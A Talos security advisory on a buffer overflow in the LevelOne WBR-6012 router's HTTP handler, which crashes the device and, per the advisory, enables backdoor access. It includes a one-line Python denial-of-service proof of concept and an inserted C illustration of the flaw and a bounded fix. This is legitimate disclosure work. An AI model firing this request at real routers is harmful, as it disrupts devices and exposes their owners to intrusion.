Talos Vulnerability Report

TALOS-2024-1997

LevelOne WBR-6012 Web Application buffer overflow vulnerability

October 30, 2024
CVE Number

CVE-2024-28052

SUMMARY

The WBR-6012 is a wireless SOHO router. It is a low-cost device which functions as an internet gateway for homes and small offices while aiming to be easy to configure and operate. In addition to providing a WiFi access point, the device serves as a 4-port wired router and implements a variety of common SOHO router capabilities such as port forwarding, quality-of-service, web-based administration, a DHCP server, a basic DMZ, and UPnP capabilities.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

LevelOne WBR-6012 R0.40e6

PRODUCT URLS

WBR-6012 - https://us.level1.com/products/wbr-6012

CVSSv3 SCORE

5.3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CWE

CWE-131 - Incorrect Calculation of Buffer Size

DETAILS

An HTTP POST request with a URI of 1454 characters or more that does not start with “upn” or “upg” will crash and reboot the device, allowing an attacker to access the backdoor account (TALOS-2024-1979).

The function located at 0x800bfcfc parses and handles HTTP data. Logic is present in this function for several HTTP methods: GET, POST, SUBS and UNSU. If a POST request is made, the device looks for the strings “/upg” and “/upn”, but the function contains no logic to explicitly handle POST requests whose URI does not start with those strings.

Early in this function there is a call (at 0x800bffcc) to a function (at 0x80004518) which receives network data, allocates memory for a buffer, and uses memcpy to move the HTTP request data into the new buffer. At the time this function is called, the size specified for the buffer allocation is 0x5BC bytes. The function prototype is:

size_t recv_data(dword data, char *buffer, dword size)

Sending an HTTP POST request that is equal to or greater in length than this buffer, and is not also handled by the “/upg” or “/upn” conditions, will cause the device to crash and reboot. A request of “POST ” + 1454 characters + “ HTTP/1.1” is 1468 (0x5BC) bytes, the size of the buffer.
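As an added illustration (not Talos's code and not the device firmware), the following C models the size boundary described above: request_line_len reproduces the advisory's 5 + 1454 + 9 = 0x5BC arithmetic, unchecked_copy_overrun is a hypothetical model of a receive routine that trusts the caller-supplied length, and recv_data_bounded shows the length check a fixed-size request buffer needs. All function names and the sample request line are assumptions constructed for this example.

```c
#include <stddef.h>
#include <string.h>

/* Allocation size named in the advisory for the HTTP request buffer (1468 bytes). */
#define REQ_BUF_SIZE 0x5BC

/* Length of "POST " + uri + " HTTP/1.1" for a URI of uri_len bytes. */
size_t request_line_len(size_t uri_len)
{
    return 5 + uri_len + 9;
}

/* Constructed sample: write "POST " + uri_len 'A's + " HTTP/1.1" into out.
   Returns the line length, or 0 if out cannot hold it. */
size_t build_post_line(char *out, size_t out_cap, size_t uri_len)
{
    size_t len = request_line_len(uri_len);
    if (len > out_cap)
        return 0;
    memcpy(out, "POST ", 5);
    memset(out + 5, 'A', uri_len);
    memcpy(out + 5 + uri_len, " HTTP/1.1", 9);
    return len;
}

/* Hypothetical model of the unsafe pattern (not the firmware's code): the
   caller-supplied length is trusted, so memcpy(buf, req, req_len) plus a NUL
   terminator needs req_len + 1 bytes. Returns how many bytes would land past a
   buf_size buffer (0 means it fits); it only counts and never performs the write. */
size_t unchecked_copy_overrun(size_t req_len, size_t buf_size)
{
    size_t needed = req_len + 1;
    return needed > buf_size ? needed - buf_size : 0;
}

/* Hardened receive: refuse any request that cannot fit with its terminator.
   Returns 0 on success, -1 when the request is too long (buffer is left empty).
   The comparison is >=, because a request exactly buf_size bytes long is the
   boundary case the advisory describes. */
int recv_data_bounded(const char *req, size_t req_len, char *buf, size_t buf_size)
{
    if (buf_size == 0 || req_len >= buf_size) {
        if (buf_size)
            buf[0] = '\0';
        return -1;
    }
    memcpy(buf, req, req_len);
    buf[req_len] = '\0';
    return 0;
}
```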

Exploit Proof of Concept

import requests

response = requests.post('http://192.168.1.1/' + 'A' * 1454)

print(response)

This will send the below HTTP POST request:

POST /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA--<SNIP>-- HTTP/1.1
Host: 192.168.1.1
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 0

The 1454 A’s plus “POST ” and “ HTTP/1.1” total 1468 (0x5BC) bytes, the size of the buffer created to hold HTTP requests.

TIMELINE

2024-06-03 - Vendor Disclosure
2024-08-05 - Status update request from TALOS - No reply
2024-09-03 - Status update request - Impending public release notification
2024-10-23 - Vendor notification of upcoming release date
2024-10-30 - Public Release

Credit

Discovered by Patrick DeSantis and Francesco Benvenuto of Cisco Talos.